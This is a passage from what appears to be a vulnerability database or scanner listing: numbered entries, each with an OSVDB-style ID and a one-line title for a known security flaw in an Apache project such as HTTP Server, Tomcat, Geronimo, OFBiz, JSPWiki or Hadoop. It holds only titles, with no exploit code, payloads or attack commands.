8767| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
8768| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
8769| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
8770| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
8771| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
8772| [63895] Apache HTTP Server mod_headers Unspecified Issue
8773| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
8774| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
8775| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
8776| [63140] Apache Thrift Service Malformed Data Remote DoS
8777| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
8778| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
8779| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
8780| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
8781| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
8782| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
8783| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
8784| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
8785| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
8786| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
8787| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
8788| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
8789| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
8790| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
8791| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
8792| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
8793| [60678] Apache Roller Comment Email Notification Manipulation DoS
8794| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
8795| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
8796| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
8797| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
8798| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
8799| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
8800| [60232] PHP on Apache php.exe Direct Request Remote DoS
8801| [60176] Apache Tomcat Windows Installer Admin Default Password
8802| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
8803| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
8804| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
8805| [59944] Apache Hadoop jobhistory.jsp XSS
8806| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
8807| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
8808| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
8809| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
8810| [59019] Apache mod_python Cookie Salting Weakness
8811| [59018] Apache Harmony Error Message Handling Overflow
8812| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
8813| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
8814| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
8815| [59010] Apache Solr get-file.jsp XSS
8816| [59009] Apache Solr action.jsp XSS
8817| [59008] Apache Solr analysis.jsp XSS
8818| [59007] Apache Solr schema.jsp Multiple Parameter XSS
8819| [59006] Apache Beehive select / checkbox Tag XSS
8820| [59005] Apache Beehive jpfScopeID Global Parameter XSS
8821| [59004] Apache Beehive Error Message XSS
8822| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
8823| [59002] Apache Jetspeed default-page.psml URI XSS
8824| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
8825| [59000] Apache CXF Unsigned Message Policy Bypass
8826| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
8827| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
8828| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
8829| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
8830| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
8831| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
8832| [58993] Apache Hadoop browseBlock.jsp XSS
8833| [58991] Apache Hadoop browseDirectory.jsp XSS
8834| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
8835| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
8836| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
8837| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
8838| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
8839| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
8840| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
8841| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
8842| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
8843| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
8844| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
8845| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
8846| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
8847| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
8848| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
8849| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
8850| [58974] Apache Sling /apps Script User Session Management Access Weakness
8851| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
8852| [58931] Apache Geronimo Cookie Parameters Validation Weakness
8853| [58930] Apache Xalan-C++ XPath Handling Remote DoS
8854| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8855| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
8856| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
8857| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
8858| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
8859| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
8860| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
8861| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
8862| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
8863| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
8864| [58805] Apache Derby Unauthenticated Database / Admin Access
8865| [58804] Apache Wicket Header Contribution Unspecified Issue
8866| [58803] Apache Wicket Session Fixation
8867| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
8868| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
8869| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
8870| [58799] Apache Tapestry Logging Cleartext Password Disclosure
8871| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
8872| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
8873| [58796] Apache Jetspeed Unsalted Password Storage Weakness
8874| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
8875| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
8876| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
8877| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
8878| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
8879| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
8880| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
8881| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
8882| [58775] Apache JSPWiki preview.jsp action Parameter XSS
8883| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8884| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
8885| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
8886| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
8887| [58770] Apache JSPWiki Group.jsp group Parameter XSS
8888| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
8889| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
8890| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
8891| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
8892| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8893| [58763] Apache JSPWiki Include Tag Multiple Script XSS
8894| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
8895| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
8896| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
8897| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
8898| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
8899| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
8900| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
8901| [58755] Apache Harmony DRLVM Non-public Class Member Access
8902| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
8903| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
8904| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
8905| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
8906| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
8907| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
8908| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
8909| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
8910| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
8911| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
8912| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
8913| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
8914| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
8915| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
8916| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
8917| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
8918| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
8919| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
8920| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
8921| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
8922| [58725] Apache Tapestry Basic String ACL Bypass Weakness
8923| [58724] Apache Roller Logout Functionality Failure Session Persistence
8924| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
8925| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
8926| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
8927| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
8928| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
8929| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
8930| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
8931| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
8932| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
8933| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
8934| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
8935| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
8936| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
8937| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
8938| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
8939| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
8940| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
8941| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
8942| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
8943| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
8944| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
8945| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
8946| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
8947| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
8948| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
8949| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
8950| [58687] Apache Axis Invalid wsdl Request XSS
8951| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
8952| [58685] Apache Velocity Template Designer Privileged Code Execution
8953| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
8954| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
8955| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
8956| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
8957| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
8958| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
8959| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
8960| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
8961| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
8962| [58667] Apache Roller Database Cleartext Passwords Disclosure
8963| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
8964| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
8965| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
8966| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
8967| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
8968| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
8969| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
8970| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
8971| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
8972| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
8973| [56984] Apache Xerces2 Java Malformed XML Input DoS
8974| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
8975| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
8976| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
8977| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
8978| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
8979| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
8980| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
8981| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
8982| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
8983| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
8984| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
8985| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
8986| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
8987| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
8988| [55056] Apache Tomcat Cross-application TLD File Manipulation
8989| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
8990| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
8991| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
8992| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
8993| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
8994| [54589] Apache Jserv Nonexistent JSP Request XSS
8995| [54122] Apache Struts s:a / s:url Tag href Element XSS
8996| [54093] Apache ActiveMQ Web Console JMS Message XSS
8997| [53932] Apache Geronimo Multiple Admin Function CSRF
8998| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
8999| [53930] Apache Geronimo /console/portal/ URI XSS
9000| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
9001| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
9002| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
9003| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
9004| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
9005| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
9006| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
9007| [53380] Apache Struts Unspecified XSS
9008| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
9009| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
9010| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
9011| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
9012| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
9013| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
9014| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
9015| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
9016| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
9017| [51151] Apache Roller Search Function q Parameter XSS
9018| [50482] PHP with Apache php_value Order Unspecified Issue
9019| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
9020| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
9021| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
9022| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
9023| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
9024| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
9025| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
9026| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
9027| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
9028| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
9029| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
9030| [47096] Oracle Weblogic Apache Connector POST Request Overflow
9031| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
9032| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
9033| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
9034| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
9035| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
9036| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
9037| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
9038| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
9039| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
9040| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
9041| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
9042| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
9043| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
9044| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
9045| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
9046| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
9047| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
9048| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
9049| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
9050| [43452] Apache Tomcat HTTP Request Smuggling
9051| [43309] Apache Geronimo LoginModule Login Method Bypass
9052| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
9053| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
9054| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
9055| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
9056| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
9057| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
9058| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
9059| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
9060| [42091] Apache Maven Site Plugin Installation Permission Weakness
9061| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
9062| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
9063| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
9064| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
9065| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
9066| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
9067| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
9068| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
9069| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
9070| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
9071| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
9072| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
9073| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
9074| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
9075| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
9076| [40262] Apache HTTP Server mod_status refresh XSS
9077| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
9078| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
9079| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
9080| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
9081| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
9082| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
9083| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
9084| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
9085| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
9086| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
9087| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
9088| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
9089| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
9090| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
9091| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
9092| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
9093| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
9094| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
9095| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
9096| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
9097| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
9098| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
9099| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
9100| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
9101| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
9102| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
9103| [36080] Apache Tomcat JSP Examples Crafted URI XSS
9104| [36079] Apache Tomcat Manager Uploaded Filename XSS
9105| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
9106| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
9107| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
9108| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
9109| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
9110| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
9111| [34881] Apache Tomcat Malformed Accept-Language Header XSS
9112| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
9113| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
9114| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
9115| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
9116| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
9117| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
9118| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
9119| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
9120| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
9121| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
9122| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
9123| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
9124| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
9125| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
9126| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
9127| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
9128| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
9129| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
9130| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
9131| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
9132| [32724] Apache mod_python _filter_read Freed Memory Disclosure
9133| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
9134| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
9135| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
9136| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
9137| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
9138| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
9139| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
9140| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
9141| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
9142| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
9143| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
9144| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
9145| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
9146| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
9147| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
9148| [24365] Apache Struts Multiple Function Error Message XSS
9149| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
9150| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
9151| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
